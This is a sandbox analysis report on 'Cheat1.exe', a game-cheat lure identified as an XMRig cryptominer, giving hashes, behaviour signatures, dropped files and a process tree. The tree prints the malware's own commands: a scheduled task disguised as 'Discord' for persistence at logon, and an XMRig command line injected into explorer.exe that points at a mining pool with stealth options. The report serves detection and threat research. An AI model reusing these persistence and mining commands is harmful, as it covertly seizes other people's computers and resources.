Overview

overview

10

Static

static

3

Cheat1.exe

windows7-x64

10

Cheat1.exe

windows10-1703-x64

10

CheatMoney.exe

windows7-x64

10

CheatMoney.exe

windows10-1703-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    154s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    23-05-2024 00:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Cheat1.exe

  • Size

    2.1MB

  • MD5

    7ced67a2b06d542de8884bd8ef3388c8

  • SHA1

    c2892cb614be03ec39988f9eb1ee5a60dfa74fe4

  • SHA256

    19b5505a570061e49819101533505d29bc37d74588b4fec9334e836ea5199ea8

  • SHA512

    0303874a789e678861d0b3501b07ac67ad5d0fc69c6607093e59775d142d17e9171a8b66ae88b6a45bed5b0f4373d6897a6b631e8f3f04bc9cb64daebe0e7b40

  • SSDEEP

    49152:Uw3FhtA331AcHguh9JBiXIgl8HBsuvQDei7KbT5+i:D3Ff41/FhBiHesuvQL8X

Score
10/10
xmrigminer

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 10 IoCs
    miner
  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\Cheat1.exe
    "C:\Users\Admin\AppData\Local\Temp\Cheat1.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4616
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Cheat1.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2280
      • C:\Windows\System32\cmd.exe
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr "C:\Users\Admin\AppData\Local\Temp\Discord.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3572
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr "C:\Users\Admin\AppData\Local\Temp\Discord.exe"
          4⤵
          • Creates scheduled task(s)
          PID:292
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\Discord.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2404
        • C:\Users\Admin\AppData\Local\Temp\Discord.exe
          C:\Users\Admin\AppData\Local\Temp\Discord.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3712
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Discord.exe"
            5⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3104
            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2328
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\conhost.exe" "/sihost64"
                7⤵
                  PID:4160
              • C:\Windows\explorer.exe
                C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=7201279 --pass=Cheat --cpu-max-threads-hint=50 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=80 --cinit-stealth
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:360

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
      Filesize

      539B

      MD5

      84f2160705ac9a032c002f966498ef74

      SHA1

      e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

      SHA256

      7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

      SHA512

      f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Discord.exe
      Filesize

      2.1MB

      MD5

      7ced67a2b06d542de8884bd8ef3388c8

      SHA1

      c2892cb614be03ec39988f9eb1ee5a60dfa74fe4

      SHA256

      19b5505a570061e49819101533505d29bc37d74588b4fec9334e836ea5199ea8

      SHA512

      0303874a789e678861d0b3501b07ac67ad5d0fc69c6607093e59775d142d17e9171a8b66ae88b6a45bed5b0f4373d6897a6b631e8f3f04bc9cb64daebe0e7b40

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      Filesize

      31KB

      MD5

      99f6ddfde83c4a40084b29ec309336c7

      SHA1

      7246f470c153a8c107fb4ff153da01f76c14db8e

      SHA256

      37773977416a09ae07d05dda3ecf488bba262436cd59a161f8189aeac5a35c81

      SHA512

      c488d00bf7678d4c28b392ddf8749cdef8875b0e451c4e7d1dcf214acbd15bfc2d71d6514c3e122a2dd7fc91aee9d4257d4551eeb12983a2858c14c8ddf23b95

      Download Submit

    • memory/360-46-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/360-50-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/360-51-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/360-52-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/360-45-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/360-47-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/360-49-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/360-48-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/360-42-0x0000000000ED0000-0x0000000000EF0000-memory.dmp

      Filesize

      128KB

      Download

    • memory/360-41-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/360-40-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2280-4-0x00007FFFCD8E3000-0x00007FFFCD8E4000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2280-6-0x000002559D1F0000-0x000002559D410000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/2280-20-0x00007FFFCD8E0000-0x00007FFFCE2CC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2280-8-0x0000025584530000-0x0000025584542000-memory.dmp

      Filesize

      72KB

      Download

    • memory/2280-0-0x00000255825C0000-0x00000255827E0000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/2280-10-0x00007FFFCD8E0000-0x00007FFFCE2CC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2280-12-0x00007FFFCD8E0000-0x00007FFFCE2CC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2280-11-0x00007FFFCD8E0000-0x00007FFFCE2CC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/4160-54-0x000002123FA80000-0x000002123FA86000-memory.dmp

      Filesize

      24KB

      Download

    • memory/4160-59-0x0000021241570000-0x0000021241576000-memory.dmp

      Filesize

      24KB

      Download